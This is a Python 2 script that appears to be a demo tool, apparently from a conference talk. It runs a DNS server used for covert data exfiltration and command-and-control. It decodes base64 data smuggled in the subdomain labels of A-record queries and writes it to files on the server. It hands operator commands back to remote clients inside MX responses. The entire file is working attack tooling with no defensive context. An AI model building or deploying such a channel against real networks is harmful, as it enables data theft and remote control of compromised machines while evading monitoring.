#!/usr/local/lib/vev/bin/python

# Written by Cory Schwartz

import base64
from time import sleep
from dnslib import DNSRecord, RR, QTYPE, A, MX
from SocketServer import BaseRequestHandler, UDPServer

IP_ADDRESS='192.168.122.102'
DOMAIN_NAME='def.con'
CMD_FILE='cmd'

class Exfiltrator(BaseRequestHandler, object):
    '''
    Use subdomains to exfiltrate data from DNS querries.
    The first two parts of the domain will be used to send data
    and the file name. The data will be base64 binary encoded.
    Except for the first two, the remaining parts of the domain
    will be ignored, so DNS should be configured up to that point.
    <data>.<filename>.real.domain.com
    '''
    def __init__(self, *args):
        self.q_processors = {
            1: self._A,      # A record
            12: self._MX,    # PTR record
            15: self._MX,    # MX record
            28: self._AAAA   # AAAA record
            }
        super(Exfiltrator, self).__init__(*args)
    def _AAAA(self, name):
        '''
        To avoid clients that submit A and AAAA records,
        These are ignored.
        '''
        return RR(name, QTYPE.A, rdata=A(IP_ADDRESS), ttl=0)
    def _A(self, name):
        '''
	A Records.
	Base64 decode message. Save to file. Send bogus response.
	'''
        rfilename = name.label[1]
        host = self.client_address[0]
        if rfilename == CMD_FILE:
            lfilename = CMD_FILE
        else:
            lfilename = host + '_' + rfilename
        try:
            with open(lfilename, 'a+b') as f:
                f.write(base64.b64decode(name.label[0]))
        except:
            pass
        return RR(name, QTYPE.A, rdata=A(IP_ADDRESS), ttl=0)
    def _MX(self, name):
        '''
	MX Records.
	Read message from file. Base64 encode it. Send the response.
	'''
        try:
            with open(CMD_FILE) as f:
                 cmd = base64.standard_b64encode(f.readlines()[-1][:-1])
        except:
            cmd = base64.standard_b64encode('')
        return RR(name, QTYPE.MX, rdata=MX(cmd + "." + DOMAIN_NAME), ttl=0)
    def handle(self):
        request = DNSRecord.parse(self.request[0])
        socket = self.request[1]
        reply = request.reply()
        answer = self.q_processors[reply.q.qtype](reply.q.qname)
        reply.add_answer(answer)
        socket.sendto(reply.pack(), self.client_address)

if __name__ == '__main__':
    HOST, PORT = '0.0.0.0', 53
    server = UDPServer((HOST, PORT), Exfiltrator)
    server.serve_forever()
